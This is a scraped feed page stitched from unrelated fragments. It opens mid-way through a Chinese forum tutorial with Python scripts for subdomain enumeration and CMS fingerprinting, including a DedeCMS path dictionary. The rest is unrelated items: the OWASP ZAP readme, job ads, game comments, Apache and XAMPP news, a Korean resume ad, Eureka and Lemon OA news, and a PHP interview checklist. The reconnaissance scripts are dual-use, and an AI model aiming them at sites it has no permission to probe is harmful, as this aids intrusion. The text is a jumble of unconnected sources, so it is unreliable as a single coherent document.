   url="http://www.baidu.com.cn/s?wd=site:"+key+"&cl=3&pn=%s"%i
   response=requests.get(url).content
   subdomains=re.findall(match,response)
   sites += list(subdomains)
site=list(set(sites))   #set()实现去重
print site
print "The number of sites is %d"%len(site)
for i in site:          
   print i

第三种就是通过一些第三方网站..实现方法类似于第二种
在之前的文章中介绍过,我就直接引用过来了
不会的话,就看这篇文章,很详细...
Python大法之从HELL0 MOMO到编写POC(五)
[Python] 纯文本查看 复制代码
import requests
import re
import sys
 
def get(domain):
        url = 'http://i.links.cn/subdomain/'
        payload = ("domain={domain}&b2=1&b3=1&b4=1".format(domain=domain))
        r = requests.post(url=url,params=payload)
        con = r.text.encode('ISO-8859-1')
        a = re.compile('value="(.+?)"><input')
        result = a.findall(con)
        list = '\n'.join(result)
        print list
if __name__ == '__main__':
        command= sys.argv[1:]
        f = "".join(command)
        get(f)

0x04 CMS指纹识别脚本编写
image
现在有很多开源的指纹识别程序,w3af,whatweb,wpscan,joomscan等,常见的识别的几种方式:
1:网页中发现关键字
2:特定文件的MD5(主要是静态文件、不一定要是MD5)
3:指定URL的关键字
4:指定URL的TAG模式

i春秋也有相应的课程
Python安全工具开发应用
本着买不起课程初心,啊哈哈,我就不讲ADO老师讲的方法了。。。啊哈哈
不过写的都差不多,只是用的模块不同。。。
本文我介绍两种方法,一种是通过API的。。另一种就是纯粹的指纹识别了,识别的多少看字典的大小了。。。
先说第一种。。。
说白了,就是发送个post请求,把关键字取出来就ok了,完全没有难度。。
我用的指纹识别网站是:http://whatweb.bugscaner.com/look/,我怎么感觉有种打广告的感觉。。。抓个包。。然后就一顿老套路
image
[Python] 纯文本查看 复制代码
#-*- coding: UTF-8 -*-
import requests
import json

def what_cms(url):
        headers = {
                'Connection': 'keep-alive',
                'Pragma': 'no-cache',
                'Cache-Control': 'no-cache',
                'Upgrade-Insecure-Requests': '1',
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
                'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
                'DNT': '1',
                'Accept-Encoding': 'gzip, deflate',
                'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8'
                    }
        post={
                'hash':'0eca8914342fc63f5a2ef5246b7a3b14_7289fd8cf7f420f594ac165e475f1479',
                'url':url,
        }
        r=requests.post(url='http://whatweb.bugscaner.com/what/', data=post, headers=headers)
        dic=json.loads(r.text)
        if dic['cms']=='':
                print 'Sorry,Unidentified........'
        else:
                print 'CMS:' + dic['cms']
if __name__ == '__main__':
        url=raw_input('PLEASE INPUT YOUR TARGET:')
        what_cms(url)


cool。。
image


接下来,就是CMS指纹识别的第二种方法了。。。
我用的匹配关键字的方法。。。
找了个dedecms的匹配字典
[AppleScript] 纯文本查看 复制代码
范例:链接||||关键字||||CMS别称
/data/admin/allowurl.txt||||dedecms||||DedeCMS(织梦)
/data/index.html||||dedecms||||DedeCMS(织梦)
/data/js/index.html||||dedecms||||DedeCMS(织梦)
/data/mytag/index.html||||dedecms||||DedeCMS(织梦)
/data/sessions/index.html||||dedecms||||DedeCMS(织梦)
/data/textdata/index.html||||dedecms||||DedeCMS(织梦)
/dede/action/css_body.css||||dedecms||||DedeCMS(织梦)
/dede/css_body.css||||dedecms||||DedeCMS(织梦)
/dede/templets/article_coonepage_rule.htm||||dedecms||||DedeCMS(织梦)
/include/alert.htm||||dedecms||||DedeCMS(织梦)
/member/images/base.css||||dedecms||||DedeCMS(织梦)
/member/js/box.js||||dedecms||||DedeCMS(织梦)
/php/modpage/readme.txt||||dedecms||||DedeCMS(织梦)
/plus/sitemap.html||||dedecms||||DedeCMS(织梦)
/setup/license.html||||dedecms||||DedeCMS(织梦)
/special/index.html||||dedecms||||DedeCMS(织梦)
/templets/default/style/dedecms.css||||dedecms||||DedeCMS(织梦)
/company/template/default/search_list.htm||||dedecms||||DedeCMS(织梦)

全的字典去百度吧,小弟不才......小弟用的是deepin,win的报错太鸡肋,实在懒得解决。。。。
[Python] 纯文本查看 复制代码
#-*- coding: UTF-8 -*-
import os
import threading
import urllib2

identification = False
g_index = 0
lock = threading.Lock()

def list_file(dir):
    files = os.listdir(dir)
    return  files

def request_url(url='', data=None, header={}):
    page_content = ''
    request = urllib2.Request(url, data, header)

    try:
        response = urllib2.urlopen(request)
        page_content = response.read()
    except Exception, e:
        pass

    return page_content

def whatweb(target):
    global identification
    global g_index
    global cms

    while True:
        if identification:
            break

        if g_index > len(cms)-1:
            break

        lock.acquire()
        eachline = cms[g_index]
        g_index = g_index + 1
        lock.release()

        if len(eachline.strip())==0 or eachline.startswith('#'):
            pass
        else:
            url, pattern, cmsname = eachline.split('||||')
            html = request_url(target+url)
            rate = float(g_index)/float(len(cms))
            ratenum = int(100*rate)

            if pattern.upper() in html.upper():
                identification = True
                print " CMS:%s,Matched URL:%s" % (cmsname.strip('\n').strip('\r'), url)
                break
    return


if __name__ == '__main__':
    print '''
          __        ___           _    ____ __  __ ____  
          \ \      / / |__   __ _| |_ / ___|  \/  / ___| 
           \ \ /\ / /| '_ \ / _` | __| |   | |\/| \___ \ 
            \ V  V / | | | | (_| | |_| |___| |  | |___) |
             \_/\_/  |_| |_|\__,_|\__|\____|_|  |_|____/ 
    '''
    threadnum = int(raw_input(' Please input your threadnum:'))
    target_url = raw_input(' Please input your target:')

    f = open('./cms.txt')
    cms = f.readlines()
    threads = []

    if target_url.endswith('/'):
        target_url = target_url[:-1]

    if target_url.startswith('http://') or target_url.startswith('https://'):
        pass
    else:
        target_url = 'http://' + target_url

    for i in range(threadnum):
        t = threading.Thread(target=whatweb, args=(target_url,))
        threads.append(t)

    print ' The number of threads is %d' % threadnum
    print 'Matching.......'
    for t in threads:
        t.start()

    for t in threads:
        t.join()

    print " All threads exit"

image
cool。。。这样就简单的实现CMS识别。。。
最近好久不写文章,手法生疏了,各位dalao见谅。。。。
最后,分享一首歌。。Kris Wu的天地
天地
特别喜欢‘江湖人说我不行,古人说路遥知马力,陪我走陪我闯天地,我从不将就我的命运’这块。。
另外,小弟没钱吃饭了,各位dalao,救救孩子吧
image
本集完
给大佬打call,内容很实用,每章都会仔细学习,动手练习,python进步很快
给大佬打call,内容很实用,每章都会仔细学习,动手练习,python进步很快 给大佬打call,内容很实用,每章都会仔细学习,动手练习,python进步很快 大佬的Python 多线程写的溜啊。佩服佩服 魔磨魔魔魔法币  感谢分享 牛逼  文章很给力 活捉大佬一枚,文章写得贼666 哇,阿甫哥哥终于更新了 沙发自占,啊哈哈哈
过来瞧瞧先 自此一下 霸总你好,霸总再见 救救孩子吧 哈哈 皮 我也去试试 感谢大佬的分享
          GitHub - zaproxy/zaproxy: The OWASP ZAP core project      Cache   Translate Page   Web Page Cache   

README.md

License GitHub release Build Status CII Best Practices Coverity Scan Build Status Github Releases Javadocs OWASP Flagship Twitter Follow

The OWASP Zed Attack Proxy (ZAP) is one of the world’s most popular free security tools and is actively maintained by hundreds of international volunteers*. It can help you automatically find security vulnerabilities in your web applications while you are developing and testing your applications. Its also a great tool for experienced pentesters to use for manual security testing.

Please help us to make ZAP even better for you by answering the ZAP User Questionnaire!

For general information about ZAP:

  • Home page - the official ZAP page on the OWASP wiki (includes a donate button;)
  • Twitter - official ZAP announcements (low volume)
  • Blog - official ZAP blog
  • Monthly Newsletters - ZAP news, tutorials, 3rd party tools and featured contributors
  • Swag! - official ZAP swag that you can buy, as well as all of the original artwork released under the CC License

For help using ZAP:

Information about the official ZAP Jenkins plugin:

To learn more about ZAP development:

Justification

Justification for the statements made in the tagline at the top;)

Popularity:

  • ToolsWatch Annual Best Free/Open Source Security Tool Survey:

Contributors:


          ApacheBench (ab), realiza pruebas de carga de tu página web      Cache   Translate Page   Web Page Cache   

En el siguiente artículo vamos a echar un vistazo a ApacheBench (ab). Este es un programa para la línea de...

El artículo ApacheBench (ab), realiza pruebas de carga de tu página web ha sido originalmente publicado en Ubunlog.


          New comment on Item for Geeklist "Solitaire Games on Your Table - July 2018"       Cache   Translate Page   Web Page Cache   

by kerskine

Related Item: Thunderbolt Apache Leader

Still my favorite DVG game!
          New comment on Item for Geeklist "Solitaire Games on Your Table - July 2018"       Cache   Translate Page   Web Page Cache   

by suzyvitale

Related Item: Thunderbolt Apache Leader

Very cool! This is up next on my "games to learn" stack. Your report has me even more excited about it!
          Sr Software Engineer - Hadoop / Spark Big Data - Uber - Seattle, WA      Cache   Translate Page   Web Page Cache   
Under the hood experience with open source big data analytics projects such as Apache Hadoop (HDFS and YARN), Spark, Hive, Parquet, Knox, Sentry, Presto is a...
From Uber - Sun, 13 May 2018 06:08:42 GMT - View all Seattle, WA jobs
          Software Development Manager – Big Data, AWS Elastic MapReduce (EMR) - Amazon.com - Seattle, WA      Cache   Translate Page   Web Page Cache   
Amazon EMR is a web service which enables customers to run massive clusters with distributed big data frameworks like Apache Hadoop, Hive, Tez, Flink, Spark,...
From Amazon.com - Mon, 02 Jul 2018 08:17:21 GMT - View all Seattle, WA jobs
          Sr. Technical Account Manager - Amazon.com - Seattle, WA      Cache   Translate Page   Web Page Cache   
You can also run other popular distributed frameworks such as Apache Spark, Apache Flink, and Presto in Amazon EMR;...
From Amazon.com - Wed, 20 Jun 2018 01:20:13 GMT - View all Seattle, WA jobs
          Java Developer - ALTA IT Services, LLC - Clarksburg, WV      Cache   Translate Page   Web Page Cache   
Experience with the following technologies – J2EE, Weblogic, Java, Javascript, JQuery, AngularJS, Apache, Linux, Subversion, and GitHub....
From ALTA IT Services, LLC - Tue, 12 Jun 2018 17:33:52 GMT - View all Clarksburg, WV jobs
          Data Science Solution Architect - CSRA - Chantilly, VA      Cache   Translate Page   Web Page Cache   
Provide domain expertise in big data distributed processing frameworks, Hadoop MapReduce and Yarn, Apache Spark, Open-Source and Commercial distributions...
From CSRA - Thu, 28 Jun 2018 22:14:43 GMT - View all Chantilly, VA jobs
          Data Science Solutions Architect - CSRA - Arlington, VA      Cache   Translate Page   Web Page Cache   
Provide domain expertise in big data distributed processing frameworks, Hadoop MapReduce and Yarn, Apache Spark, Open-Source and Commercial distributions...
From CSRA - Fri, 06 Jul 2018 10:19:49 GMT - View all Arlington, VA jobs
          Java/JEE Developer - Voonyx - Lac-beauport, QC      Cache   Translate Page   Web Page Cache   
Java Enterprise Edition (JEE), Eclipse/IntelliJ/Netbeans, Spring, Apache Tomcat, JBoss, WebSphere, Camel, SOAP, REST, JMS, JPA, Hibernate, JDBC, OSGI, Servlet,...
From Voonyx - Tue, 27 Mar 2018 05:13:53 GMT - View all Lac-beauport, QC jobs
          Développeur Java/JEE - Voonyx - Lac-beauport, QC      Cache   Translate Page   Web Page Cache   
Java Enterprise Edition (JEE), Eclipse/IntelliJ/Netbeans, Spring, Apache Tomcat, JBoss, WebSphere, Camel, SOAP, REST, JMS, JPA, Hibernate, JDBC, OSGI, Servlet,...
From Voonyx - Tue, 27 Mar 2018 05:13:51 GMT - View all Lac-beauport, QC jobs
          Comment on Leggerezza e potenza in PHP: Code Igniter by anonymous coward      Cache   Translate Page   Web Page Cache   
CodeIgniter è stato un framework importante, ma *consigliarlo* nel 2018 è semplicemente da irresponsabili. Il fatto che sia compatibile con PHP 5.3 significa che, a livello di codice, è fermo a dieci anni fa, e non fa alcun utilizzo di tutte le funzionalità moderne che rendono PHP non dico piacevole ma sopportabile. L'ultima major version è uscita nel 2016, da allora solo bugfix. Non esiste supporto a Composer, quindi usare pacchetti non specificatamente creati per CodeIgniter è difficile se non impossibile (alla faccia della modularità). Non esiste possibilità di creare middleware, quindi bisogna scrivere un sacco di boilerplate in ogni controller (alla faccia dell'eleganza). Poi l'ossessione per la velocità mi fa ridere, dato che nel 99% dei casi parliamo di pochi ms di differenza, che spesso vengono annullati con l'opcache di PHP, e che non sono certo il collo di bottiglia dell'applicazione come possono essere invece più facilmente le query al DB. Francamente se uno deve proprio sviluppare in PHP fa decisamente meglio a usare Laravel (magari Lumen se proprio ci tiene ai microframework) o Symfony, non certo un framework rimasto pressoché identico da più di 10 anni e che dovrebbe essere relegato ai progetti legacy. Peraltro non sono affatto più difficili da configurare (quando mai si devono modificare dei moduli Apache per installare Laravel?!), ma sospetto che per "configurare" tu intenda "caricare dei file .php su un FTP e andare su miosito.it", nel qual caso forse dovresti studiarti un po' di development moderno ma proprio dalle basi.
          XAMPP for Windows 7.2.7      Cache   Translate Page   Web Page Cache   
Description: XAMPP for Windows is an easy to install Apache distribution for Windows containing MySQL, PHP and Perl.XAMPP is an Apache distribution containing MySQL, PHP and Perl.Many people know from their own experience that it's not easy to install an Apache web server and it gets harder if you want to add MySQL, PHP and […]
          XAMPP for Windows 7.2.7      Cache   Translate Page   Web Page Cache   
Description: XAMPP for Windows is an easy to install Apache distribution for Windows containing MySQL, PHP and Perl.XAMPP is an Apache distribution containing MySQL, PHP and Perl.Many people know from their own experience that it's not easy to install an Apache web server and it gets harder if you want to add MySQL, PHP and […]
          XAMPP 7.2.7      Cache   Translate Page   Web Page Cache   
Apache distribuce, která zahrnuje Apache 2.4, MariaDB 10.1, PHP 7.0, phpMyAdmin 4.5, k dispozici i portable a linuxová verze (WinALL/Linux/MacOSX; open-source)
          자기소개서 신세계I&C SI 지원자 경력기술서 그룹사 인사팀 출신 현직 컨설턴트 작성      Cache   Translate Page   Web Page Cache   
[자기소개서] 신세계I&C. SI 지원자 자기소개서 [그룹사 인사팀 출신 현직 컨설턴트 작성][자기소개서] SI사업 지원자 자기소개서 [그룹사 인사팀 출신 현직 컨설턴트 작성][자기소개서] 삼성엔지니어링 경력 지원자 자기소개서 [그룹사 인사팀 출신 현직 컨설턴트 작성][자기소개서] 제약영업 경력자 지원자 자기소개서 [그룹사 인사팀 출신 현직 컨설턴트 작성][자기소개서] GS건설, 경력 지원자 자기소개서 [그룹사 인사팀 출신 현직 컨설턴트 작성][자기소개서] 외국계 항공사 지상직 경력 지원자 자기소개서 [그룹사 인사팀 출신 현직 컨설턴트 작성] ◆ 신세계I&C. SI 파트 지원자에 맞게끔 컨설팅 진행 ◆ 각각의 카피성 소제목으로 다른 경쟁자와 차별성 도모 ◆ 실제 서류전형 합격자에 대한 자기소개서 ◆ 대기업 인사팀 출신의 현직 컨설턴트 작성 자료 ◐ 실제 작성 Tip ◑ ▶ 서술식으로 프로젝트를 기술함으로써 체계적인 업무 추진력을 어필함. ▶ 다양한 프로젝트 경험을 세밀하게 기술함으로써 프로 근성 표현함. 1. 들어가는 말 - 경험은 최고의 차별성. 2. 한 걸음씩 프로의 모습으로 다가가는. 3. 주요 경력사항 - 차별적인 노하우를 제 것으로. 4. 맺은 말 - ’포기’라는 두 글자를 지우고. 3. (주)OOOOOOOO ◈ OO업무 지원시스템 OOOOOO 단말기 개발 (OOOO.04~2002.06) - OO 모든 업무를 직접 현장에서 사용할 수 있는 OOO 솔루션 개발 클라이언트 기능 - 개발환경 WINCE Visual C++ ◈ ㈜OOOO의 OOOOO 홈페이지 개발 (OOOO.06~2002.OO) - OOOOO이나 OO 등 자주 잃어 버릴 수 있는 물건을 찾아주는 홈페이지 개발 - 회원가입과 각종 분실처리 현황 등 기능과 관리자 기능개발 - 개발환경 리눅스 DB2 Apache-tomcat jsp java ◈ OOOOOOOO의 KMS/EDMS (2002.09~2002.10) - EDMS 개발 및 유지 보수 - 개발환경 Database Server (Oracle 8i) WAS(Oracle 9ias) Doucumentum pakage이용 Java servlet . 주요 경력사항 中에서. http://cafe.daum.net/InsaResume 인사팀 윤호상이 쓴 자기소개서 [자기소개서] QC 및 QA 분야 경력 지원자 자기소개서 [그룹사 인사팀 출신 현직 컨설턴트 작성][자기소개서] 터미널 운영 및 물류 파트 경력직 지원자 자기소개서 [그룹사 인사팀 출신 현직 컨설턴트 작성][자기소개서] 서비스기획 및 프로모션 이벤트 파트 경력자 지원자 자기소개서 [그룹사 인사팀 출신 현직 컨설턴트 작성][자기소개서] 경리 및 회계, IR 파트 경력 지원자 자기소개서 [그룹사 인사팀 출신 현직 컨설턴트 작성][자기소개서] 신세계백화점 매장관리 지원자 자기소개서 [그룹사 인사팀 출신 현직 컨설턴트 작성][자기소개서] 신세계백화점 매장영업 지원자 자기소개서 [그룹사 인사팀 출신 현직 컨설턴트 작성][자기소개서] 신세계백화점 홍보 지원자 자기소개서 [그룹사 인사팀 출신 현직 컨설턴트 작성][자기소개서] 신세계 이마트 마케팅 파트 지원자 자기소개서 [그룹사 인사팀 출신 현직 컨설턴트 작성][자기소개서] 웹 기획 (경력자) 지원자 자기소개서 [그룹사 인사팀 출신 현직 컨설턴트 작성][자기소개서] 회계/결산/세무/경리 (경력직) 지원자 자기소개서 [그룹사 인사팀 출신 현직 컨설턴트 작성][자기소개서] SI 및 컴퓨터, 전산 파트 지원자 자기소개서 [그룹사 인사팀 출신 현직 컨설턴트 작성][경력기술서] 웹기획 지원자 경력기술서 [그룹사 인사팀 출신 현직 컨설턴트 작성][경력기술서] 캐피탈 지점장 지원자 경력기술서 [그룹사 인사팀 출신 현직 컨설턴트 작성][경력기술서] 삼성네트웍스 네트워크 운영 지원자 경력기술서 [그룹사 인사팀 출신 현직 컨설턴트 작성] 조회수:4557회
          Azure HDInsight unterstützt Apache Spark 2.3      Cache   Translate Page   Web Page Cache   
Apache Spark 2.3.0 ist jetzt für den produktiven Einsatz auf dem verwalteten Big Data-Service "Azure HDInsight" verfügbar. Von Bugfixes (mehr als 1.400 Tickets wurden in dieser Version bearbeitet) bis hin zu neuen experimentellen Funktionen Mehr…...(read more)
          凉凉了,Eureka 宣布闭源,Spring Cloud 何去何从?      Cache   Translate Page   Web Page Cache   

今年 Dubbo 活了,并且被 Apache 收了。同时很不幸,Spring Cloud 下的 Netflix Eureka 组件项目居然宣布闭源了。。

已经从 Dubbo 迁移至 Spring Cloud 上的人,你们还好吗?

闭源:https://github.com/Netflix/eureka/wiki

大概意思是: Eureka 2.0 的开源工作已经停止,依赖于开源库里面的 Eureka 2.x 分支构建的项目或者相关代码,风险自负!

Eureka 是什么?

用 Spring Cloud 作为微服务框架的开发者应该都知道,Eureka 是其默认的也是推荐的服务注册中心组件。

既然首推 Eureka 作为服务注册中心组件也是因为 Netflix 优秀的各种套件,如 Zuul(服务网关组件)、Hystrix(熔断组件) 等都是 Spring Cloud 一站式解决方案。

我们来看下 Eureka 和服务注册的关系图。

Eureka 开源史末

Netflix 公司 2012 年将 Euerka 正式开源。

Eureka 1.x 最新版本 1.9.3,不知道是否会成为 Eureka 最后的开源版本。

本次闭源在其官网未到相关申明,是否开历史倒车,是否有其他阴谋,我们将持续跟进。

Spring Cloud 何去何从?

对于 Eureka 的闭源,Spring Cloud 将何去何从?后续会不会替换默认的服务注册组件呢?不得而知,Spring Cloud 版本发布很快,已经快跟不上了。

Eureka 2.x 还未发布正式版本,Spring Cloud 还是在 1.x 上面开发的,最新版本依赖 1.9.2,所以虽然国内大多数公司也在用 Eureka,但暂时不会受影响。

1.x 相对稳定,建议不要盲目升级或者切换到别的中间件。不过,随着 Eureka 的闭源,后续还是有必要迁移至 Consul、ZooKeeper、Etcd 等开源中间件上面去的。

对于 Eureka 的闭源及带来的影响,你怎么看?欢迎留言讨论。


          开源 OA Lemon OA 发布 1.9.0 版本,时隔一年的新版本      Cache   Translate Page   Web Page Cache   

lemon-1.9.0 (2018-07-06),时隔一年的新版本

  1. [cdn] 重新规划静态资源路径,
    cdn目录下的所有静态资源包含组件名和版本号。

  2. [data] 不再使用sql初始化数据,改用csv和json初始化数据。

  3. [user] 优化账号管理功能。

  4. [bpm] 增加了几个演示流程。

  5. [biz] 尝试添加车辆,会议室,考勤管理。

Lemon是一款基于Java开发的开源OA。开源协议Apache 2.0。

我们的目标是逐步吸收各种业务需求,最终发展成为能够包含所有功能的工具栈,实现尽量减少编码,只通过配置就完成各种定制需求。

极速起步

    安装JDK。

    下载lemon-1.7.0.zip

    解压后运行startup.bat

    启动完成后。

    访问http://localhost:8080/

登录账号: lingo
登录密码: 1

Web流程设计器

集成Modeler,直接在浏览器里拖拽设计流程。(免费版不支持IE)

电子表单

在浏览器里拖拽设计表单,设计的表单与流程绑定,无需编码可以直接调用。

集成组织机构

支持公司,部门,岗位,人员,与流程引擎无缝集成。


android客户端截图

      

业务介绍

OA - Office Automation(办公自动化),主要目的是解决公司内部的协作问题,所以也称为协同办公。

所以,我们主要做的就是怎么让公司部门里的一群人,可以分工协作完成同一件事情,或者叫项目。目前我们将目光集中在两点上:

  • 多人协作,反映到系统里就是任务,流程,日程。

  • 知识积累,反映到系统里就是文档,论坛。

参考对OA功能点的探讨功能列表。

详情请看软件主页:)


          Apache 基金会发布2018 财年年报:Java 项目占大半      Cache   Translate Page   Web Page Cache   

Apache 软件基金会近日发布了长达 40 页的 2018 财年(2017.5.1-2018.4.30)年度报告,这个全球最大的开源基金会,目前已拥有 300 多个开源项目,涵盖人工智能和深度学习、大数据、构建管理、云计算、内容管理、DevOps、物联网和边缘计算、移动、服务器和 Web 框架等众多领域。

年报亮点包括:

  • 2017-2018 财年利润:548630 美元;

  • 共有 8 位白金赞助商,9 位金牌赞助商,8 位银牌赞助商和 14 位铜牌赞助商;

  • 新增 51 名 ASF 成员,总数达 731 名;

  • 拥有超过 6700 位代码提交者;

  • 16 个项目从 Apache 孵化器升级为顶级项目;

  • Apache 项目类别 TOP5 :库、大数据、网络服务器、XML 和 Web 框架;

  • Apache 项目语言 TOP5 :Java、C、Python、C++ 和 JavaScript;

  • 规模最大的 Apache 存储库 TOP5 :OpenOfficeNetBeansFlexHadoopTrafodion

  • 代码提交数量最多的 Apache 存储库 TOP5 :HadoopAmbariCamelIgniteBeam

  • 邮件列表开发者数量最多的 Apache 存储库 TOP5 :IgniteKafkaTomcatBeamJames

  • 邮件列表用户数量最多的 Apache 存储库 TOP5 :Lucene / SolrIgniteFlinkKafkaCassandra

完整 PPT 报告:APACHE ANNUAL REPORT FY2018


          Senior Cloud/Web Infrastructure Engineer - RK Management Consultants, Inc. - Minneapolis, MN      Cache   Translate Page   Web Page Cache   
Develop operational practice for technologies like Opscode Chef, multiple Public Cloud platforms, Basho Riak, Cassandra, Tomcat, Apache, Nginx, Sensu, Splunk,...
From Indeed - Tue, 19 Jun 2018 15:06:13 GMT - View all Minneapolis, MN jobs
          PHP 面试知识大汇总      Cache   Translate Page   Web Page Cache   

该仓库主要真是国内 PHP 面试经常被问到的知识点做汇总。 仅是针对性指出知识点,相应还需自己查找相关资料系统学习。 我希望各位能不仅仅了解是什么,还要了解为什么,以及背后的原理。

如果您有对相应知识点非常系统的资料,欢迎 PR 增加链接。

基础篇

  • 了解大部分数组处理函数
  • 字符串处理函数(区别 mb_ 系列函数)
  • & 引用,结合案例分析
  • == 与 === 区别
  • isset 与 empty 区别
  • 全部魔术函数理解
  • static、$this、self 区别
  • private、protected、public、final 区别
  • OOP 思想
  • 抽象类、接口 分别使用场景
  • Trait 是什么东西
  • echo、print、print_r 区别
  • __construct 与 __destruct 区别
  • static 作用(区分类与函数内)
  • __toString() 作用
  • 单引号’ 与双引号 “ 区别
  • 常见 HTTP 状态码,分别代表什么含义
  • 301 什么意思 404 呢

进阶篇

  • Autoload、Composer 原理
  • Session 共享、存活时间
  • 异常处理
  • 如何 foreach 迭代对象
  • 如何数组化操作对象 $obj[key]
  • 如何函数化对象 $obj(123);
  • yield 是什么,说个使用场景
  • PSR 是什么,PSR-1, 2, 4, 7
  • 如何获取客户端 IP 和 服务端 IP 地址
  • 如何开启 PHP 异常提示
  • 如何返回一个301重定向
  • 如何获取扩展安装路径
  • 字符串、数字比较大小的原理,注意 0 开头的8进制、0x 开头16进制
  • BOM 头是什么,怎么除去
  • 什么是 MVC
  • 依赖注入实现原理
  • 如何异步执行命令
  • 模板引擎是什么,解决什么问题、实现原理(Smarty、Twig、Blade)
  • 如何实现链式操作$obj->w()->m()->d();
  • Xhprof 、Xdebug 性能调试工具使用
  • 索引数组[1, 2]与关联数组['k1'=>1, 'k2'=>2]有什么区别
  • 依赖注入原理

实践篇

  • 给定二维数组,根据某个字段排序
  • 如何判断上传文件类型,如:仅允许 jpg 上传
  • 不使用临时变量交换两个变量的值$a=1; $b=2;=>$a=2; $b=1;
  • strtoupper 在转换中文时存在乱码,你如何解决?php echo strtoupper('ab你好c');
  • Websocket、Long-Polling、Server-Sent Events(SSE) 区别
  • "Headers already sent" 错误是什么意思,如何避免

算法篇

  • 快速排序(手写)
  • 冒泡排序(手写)
  • 二分查找(了解)
  • 查找算法 KMP(了解)
  • 深度、广度优先搜索(了解)

数据结构篇(了解)

  • 堆、栈特性
  • 队列
  • 哈希表
  • 链表

对比篇

  • Cookie 与 Session 区别
  • GET与POST区别
  • include与require区别
  • include_once与require_once区别
  • Memcached 与 Redis 区别
  • MySQL 各个存储引擎、及区别(一定会问 MyISAM 与 Innodb 区别)
  • HTTP 与 HTTPS 区别
  • Apache 与 Nginx 区别
  • define() 与 const 区别
  • traits 与 interfaces 区别 及 traits 解决了什么痛点?
  • Git 与 SVN 区别

数据库篇

  • MySQL
    • CRUD
    • JOIN、LEFT JOIN 、RIGHT JOIN、INNER JOIN
    • UNION
    • GROUP BY + COUNT + WHERE 组合案例
    • 常用 MySQL 函数,如:now()、md5()、concat()、uuid()等
    • 1:1、1:n、n:n各自适用场景
    • 数据库优化手段
      • 索引、联合索引(命中条件)
      • 分库分表(水平分表、垂直分表)
      • 分区
      • 会使用explain分析 SQL 性能问题,了解各参数含义
      • Slow Log(有什么用,什么时候需要)
  • MSSQL(了解)
    • 查询最新5条数据
  • NOSQL
    • Redis、Memcached、MongoDB
    • 对比、适用场景
    • 你之前为了解决什么问题使用的什么,为什么选它?

服务器篇

  • 查看 CPU、内存、时间、系统版本等信息
  • find 、grep 查找文件
  • awk 处理文本
  • 查看命令所在目录
  • 自己编译过 PHP 吗?如何打开 readline 功能
  • 如何查看 PHP 进程的内存、CPU 占用
  • 如何给 PHP 增加一个扩展
  • 修改 PHP Session 存储位置、修改 INI 配置参数
  • 负载均衡有哪几种,挑一种你熟悉的说明其原理
  • 数据库主从复制 M-S 是怎么同步的?是推还是拉?会不会不同步?怎么办
  • 如何保障数据的可用性,即使被删库了也能恢复到分钟级别。你会怎么做。
  • 数据库连接过多,超过最大值,如何优化架构。从哪些方便处理?
  • 502 大概什么什么原因? 如何排查 504呢?

架构篇

  • 偏运维(了解):
    • 负载均衡(Nginx、HAProxy、DNS)
    • 主从复制(MySQL、Redis)
    • 数据冗余、备份(MySQL增量、全量 原理)
    • 监控检查(分存活、服务可用两个维度)
    • MySQL、Redis、Memcached Proxy 、Cluster 目的、原理
    • 分片
    • 高可用集群
    • RAID
    • 源代码编译、内存调优
  • 缓存
    • 工作中遇到哪里需要缓存,分别简述为什么
  • 搜索解决方案
  • 性能调优
  • 各维度监控方案
  • 日志收集集中处理方案
  • 国际化
  • 数据库设计
  • 静态化方案

框架篇

  • ThinkPHP(TP)、CodeIgniter(CI)、Zend(非 OOP 系列)
  • Yaf、Phalcon(C 扩展系)
  • Yii、Laravel、Symfony(纯 OOP 系列)
  • Swoole、Workerman (网络编程框架)
  • 对比框架区别几个方向点
    • 是否纯 OOP
    • 类库加载方式(自己写 autoload 对比 composer 标准)
    • 易用性方向(CI 基础框架,Laravel 这种就是高开发效率框架以及基础组件多少)
    • 黑盒(相比 C 扩展系)
    • 运行速度(如:Laravel 加载一大堆东西)
    • 内存占用

设计模式

  • 单例模式(重点)
  • 工厂模式(重点)
  • 观察者模式(重点)
  • 依赖注入(重点)
  • 装饰器模式
  • 代理模式
  • 组合模式

安全篇

  • SQL 注入
  • XSS 与 CXRF
  • 输入过滤
  • Cookie 安全
  • 禁用mysql_系函数
  • 数据库存储用户密码时,应该是怎么做才安全
  • 验证码 Session 问题
  • 安全的 Session ID (让即使拦截后,也无法模拟使用)
  • 目录权限安全
  • 包含本地与远程文件
  • 文件上传 PHP 脚本
  • eval函数执行脚本
  • disable_functions关闭高危函数
  • FPM 独立用户与组,给每个目录特定权限
  • 了解 Hash 与 Encrypt 区别

高阶篇

  • PHP 数组底层实现 (HashTable + Linked list)
  • Copy on write 原理,何时 GC
  • PHP 进程模型,进程通讯方式,进程线程区别
  • yield 核心原理是什么
  • PDO prepare 原理
  • PHP 7 与 PHP 5 有什么区别
  • Swoole 适用场景,协程实现方式

前端篇

  • 原生获取 DOM 节点,属性
  • 盒子模型
  • CSS 文件、style 标签、行内 style 属性优先级
  • HTML 与 JS 运行顺序(页面 JS 从上到下)
  • JS 数组操作
  • 类型判断
  • this 作用域
  • .map() 与 this 具体使用场景分析
  • Cookie 读写
  • JQuery 操作
  • Ajax 请求(同步、异步区别)随机数禁止缓存
  • Bootstrap 有什么好处
  • 跨域请求 N 种解决方案
  • 新技术(了解)
    • ES6
    • 模块化
    • 打包
    • 构建工具
    • vue、react、webpack、
    • 前端 mvc
  • 优化
    • 浏览器单域名并发数限制
    • 静态资源缓存 304 (If-Modified-Since 以及 Etag 原理)
    • 多个小图标合并使用 position 定位技术 减少请求
    • 静态资源合为单次请求 并压缩
    • CDN
    • 静态资源延迟加载技术、预加载技术
    • keep-alive
    • CSS 在头部,JS 在尾部的优化(原理)

网络篇

  • IP 地址转 INT
  • 192.168.0.1/16 是什么意思
  • DNS 主要作用是什么?
  • IPv4 与 v6 区别

网络编程篇

  • TCP 三次握手流程
  • TCP、UDP 区别,分别适用场景
  • 有什么办法能保证 UDP 高可用性(了解)
  • TCP 粘包如何解决?
  • 为什么需要心跳?
  • 什么是长连接?
  • HTTPS 是怎么保证安全的?
  • 流与数据报的区别
  • 进程间通信几种方式,最快的是哪种?
  • fork()会发生什么?

API 篇

  • RESTful 是什么
  • 如何在不支持DELETE请求的浏览器上兼容DELETE请求
